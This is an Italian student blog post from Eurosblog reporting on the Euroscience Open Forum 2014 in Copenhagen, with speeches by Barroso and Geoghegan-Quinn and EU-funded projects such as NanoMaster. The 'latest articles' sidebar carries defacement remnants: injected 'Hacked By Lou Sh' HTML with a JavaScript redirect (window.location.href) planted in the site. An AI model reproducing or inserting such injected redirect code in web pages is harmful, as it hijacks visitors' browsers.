EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Aggiungere un commento

Euroscience Open Forum: la ricerca europea in vetrina




Barroso leader della conferenza a Copenaghen

Si è concluso lo scorso 26 giugno l’Euroscience Open Forum (ESOF) 2014, iniziativa scientifica biennale europea, ospitata quest’anno dalla città di Copenaghen e organizzata in collaborazione con l’EuroScience Association.

Che cos’è ESOF? E’ il più grande meeting europeo nel settore scientifico che riunisce ricercatori, imprenditori, innovatori, responsabili politici ed il pubblico di tutta Europa per portare avanti il dibattito sulle scoperte scientifiche e le aspettative per il futuro.

Il presidente della Commissione europea Barroso è intervenuto durante la cerimonia di apertura parlando delle tradizioni scientifiche passate e del modo in cui condividiamo sempre di più le sfide globali per il futuro, attraverso la ricerca di soluzioni innovative. Il 24 giugno il direttore generale per la ricerca e l’innovazione Smits è intervenuto attraverso un dibattito per discutere del ruolo della scienza in Europa, della cooperazione internazionale e di Horizon 2020, il progetto europeo per la ricerca e l’innovazione. Durante le varie sessioni scientifiche, attenzione particolare è stata rivolta al tema della resistenza degli antibiotici, per vagliarne i rischi ed affrontare le future sfide nel settore medico-scientifico.

JPEG - 5.6 Kb

L’ESOF ha rappresentato anche una importante vetrina per i progetti finanziati dall’UE e le aziende che hanno ottenuto successi scientifici grazie ai fondi europei per la ricerca: tra questi ricordiamo il progetto NanoMaster, che promuove progetti che si basano sul grafene per le stampanti 3D con lo scopo di ridurre la quantità di plastica utilizzata e quindi il peso stesso della componente. Inoltre l’obiettivo è quello di impartire nello stesso tempo la funzionalità elettrica e termica. L’intento sarà raggiunto attraverso lo sviluppo di prossima generazione di grafene rinforzato con nano-intermedio che può essere utilizzato in processi ad alto rendimento di produzione dei componenti in plastica esistenti.

PNG - 35 Kb

Nelle parole di Máire Geoghegan-Quinn: “Sono passati quasi due anni da quando mi sono rivolta alla Conferenza ESOF a Dublino. La plenaria ESOF mi ha offerto la possibilità di articolare la mia ferma convinzione nella scienza come base per una vita migliore e un’economia migliore. Ho anche parlato dei piani della Commissione europea per riformare il modo in cui finanziare la ricerca e l’innovazione e la necessità di investire di più nella scienza anche con una forte pressione sul bilancio dell’UE”.

Il commento del Presidente della Commissione europea Barroso: “Stiamo costruendo ponti tra tutte le discipline scientifiche. La nostra Unione dell’innovazione mira a integrare la scienza e l’innovazione in tutti i settori, e alimentare trasversalmente le idee per sviluppare nuove tecnologie, prodotti e servizi per le sfide complesse multi-disciplinari delle nostre società. Questo è il motivo per cui Horizon 2020 è stato vincente per l’approccio basato sulla sfida e perché l’Istituto europeo di innovazione e tecnologia ha recentemente lanciato il suo invito a presentare proposte per la conoscenza e dell’innovazione”.



Nessun commento
ds Aggiungere un commento

Autori

Vanessa Piacenti
Studentessa del corso di laurea triennale in Scienze della comunicazione, Università si Roma Tor Vergata.

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015

© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France